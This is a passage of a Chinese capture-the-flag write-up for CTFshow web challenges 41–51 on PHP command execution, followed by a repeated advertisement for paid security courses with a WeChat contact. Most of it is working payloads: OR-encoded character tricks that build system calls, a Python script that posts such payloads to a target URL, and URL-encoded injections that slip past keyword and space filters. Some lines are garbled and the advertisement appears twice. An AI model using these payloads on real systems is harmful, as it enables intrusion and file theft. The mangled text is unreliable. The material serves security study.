CTFshow web入门 web41~web55 命令执行_ctfshow web41，2024年最新简单聊聊2024年网络安全开发的现状和思考

k %60 %0b
l %60 %0c
m %60 %0d
n %60 %0e
o %60 %0f
p %60 %10
q %60 %11
r %60 %12
s %60 %13
t %60 %14
u %60 %15
v %60 %16
w %60 %17
x %60 %18
y %60 %19
z %60 %1a
{ %60 %1b
| %60 %1c
} %60 %1d
~ %60 %1e
` %60 %20

从所有字符（ASCII[0-255]）中排除掉被过滤的，然后再判断或运算得到的字符是否为可见字符

可以一个一个的进行构造：比如要执行system的话就可以用以下的方式：

c=(“%13%19%13%14%05%0d”|“%60%60%60%60%60%60”)(“%03%01%14%00%06%0c%01%00”|“%60%60%60%20%60%60%60%2a”)

system(“cat fla*”)

c=“”)😭‘%60%60%60%60%60%60’|‘%13%19%13%14%05%0d’)((‘%03%01%14’|‘%60%60%60’).’ *');#

最前面的"");和前面的eval(合起来构成一个命令
中间是完整的一个语句：system(cat *);
最后的#表示注释，把后面所有的东西都注释起来功能消失了

使用POST传参：右键–>change request method
记得使用BP

也能用羽神的脚本更方便：

-*- coding: utf-8 -*-

import requests
import urllib
from sys import *
import os

os.system(“F:\desktop\Learning\CTFtools\Web\phpstudy_pro\phpstudy_pro\WWW\index.php”) # 没有将php写入环境变量需手动运行
if (len(argv) != 2):
print(“=” * 50)
print(‘USER：python exp.py ’)
print(“eg： python exp.py http://ctf.show/”)
print(“=” * 50)
exit(0)
url = argv[1]

def action(arg):
s1 = “”
s2 = “”
for i in arg:
f = open(r"F:\desktop\Learning\CTFtools\Web\phpstudy_pro\phpstudy_pro\WWW\rce.txt", “r”) # 填txt的文件位置
while True:
t = f.readline()
if t == “”:
break
if t[0] == i:

print(i)

s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = “(”" + s1 + “”|“” + s2 + “”)"
return (output)

while True:
param = action(input(“\n[+] your function：”)) + action(input(“[+] your command：”))
data = {
‘c’: urllib.parse.unquote(param)
}
r = requests.post(url, data=data)
print(“\n[*] result:\n” + r.text)

命令行的使用：

python rce.py [url]

web42(>/dev/null 2>&1)

终于没有preg_match函数来过滤了，这回里面都是认识的，只不过后面GET传参的c还连接了一个

“>/dev/null 2>&1”

对于这个语句：

/dev/null：
说明一下 /dev/null 说白了就是写入这个里面的内容都会丢失，读取这里面的内容什么也不会读取到
而前面的 > 表示重定向代表的是要去哪里
因为 > 前面没有数值，所以默认的是1，表示标准输出重定向到 /dev/null (空设备文件)
因此不会显示任何的数据，同时也不会读取到任何的数据

2>&1：
这里的1表示stdout标准输出，系统默认值是1，因此 > 前面没有值的时候就是默认标准输出 1>
这里的2表示stderr标准错误
&表示等同于的意思
在这里这个语句的意思就表示2的输出重定向等同于1，即标准错误输出重定向等同于标准输出
因为之前标准输出已经重定向到空设备文件，左移标准错误输出也重定向到空设备文件

这整一句话的意思是：让所有输出流(不管你是对的还是错的)都重定向到空设备文件中丢弃掉

所以关键就是不能让后面这个重定向执行下去就行

构造payload：

c=cat flag.php; // 用 ; 把命令隔断
c=cat flag.php|| // ||表示只执行||前面的语句
c=cat flag.php%0a // %0a是url编码，表示的是换行
c=cat flag.php%26 // %26是url编码，表示的是&符

另外说明一下：
| 表示只执行后面的命令
|| 表示只执行前面的命令
&和&& 表示两条命令都会执行

此外，php版本小于5的时候因为php的底层是C，所以截断有另外的%00可以使用

—web43~web52过滤+>/dev/null 2>&1—

web43(过滤分号、cat)

这个题其实就是在上一题的基础上多加了个过滤

过滤了

;、cat

说到底，这么多能有回显的函数，也不差cat这一个，形式有这么多，也不差分号这一个

构造payload：

c=nl flag.php%0a
c=more flag.php%0a
c=sort flag.php%0a
c=less flag.php%0a
c=tac flag.php%0a
c=tail flag.php%0a
c=strings flag.php%0a

||也能用

web44(过滤flag)

过滤了：

;、cat、flag

区区不能使用flag而已，也有构造的形式

构造payload：

c=nl fla*%0a
c=more fla*%0a
c=sort fla*%0a
c=less fla*%0a
c=tac fla*%0a
c=tail fla*%0a
c=strings fla*%0a

||也能用

web45(过滤空格)

过滤了：

;、cat、flag、[空格]

空格不能用可以使用tab键代替，url编码是%09，反正tab是最多是4个空格，多几个空格也不会怎样

空格绕过：

%09
${IFS}
${IFS}$9
<

构造payload：

?c=nl%09fl*%0a
?c=nl<fla\g.php%0a
?c=echo$IFS‘nl${IFS}fl*`%0a // 反引号表示无回显的命令执行，常配合echo来打印输出

web46(过滤$、*、数字)

过滤了：

;、cat、flag、[空格]、[0-9]、$、*

构造payload：

?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a

web47(过滤more、less、head、sort、tail)

过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail

构造payload：

?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla*%0a
?c=nl<fla\g.php%0a

web48(过滤sed、cut、awk、strings、od、curl、[反引号])

过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]

构造payload：

还是一样
?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla\g.php%0a

web49(过滤%)

过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%

构造payload：

%被过滤掉了，能用的就少很多了，但还是有
?c=nl<fla’'g.php||
?c=nl<fla\g.php||

web50(过滤\x09、\x26)

过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%、\x09、\x26

\x09与\x26的含义其实就是%09（tab键）和%26（&）

构造payload：

?c=nl<fla’'g.php||
?c=nl<fla\g.php||

web51(过滤tac)

过滤了：

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26

多过滤了一个tac（我寻思着我也不怎么用啊）

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

B-1712651291016)]

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-II8ksPWG-1712651291017)]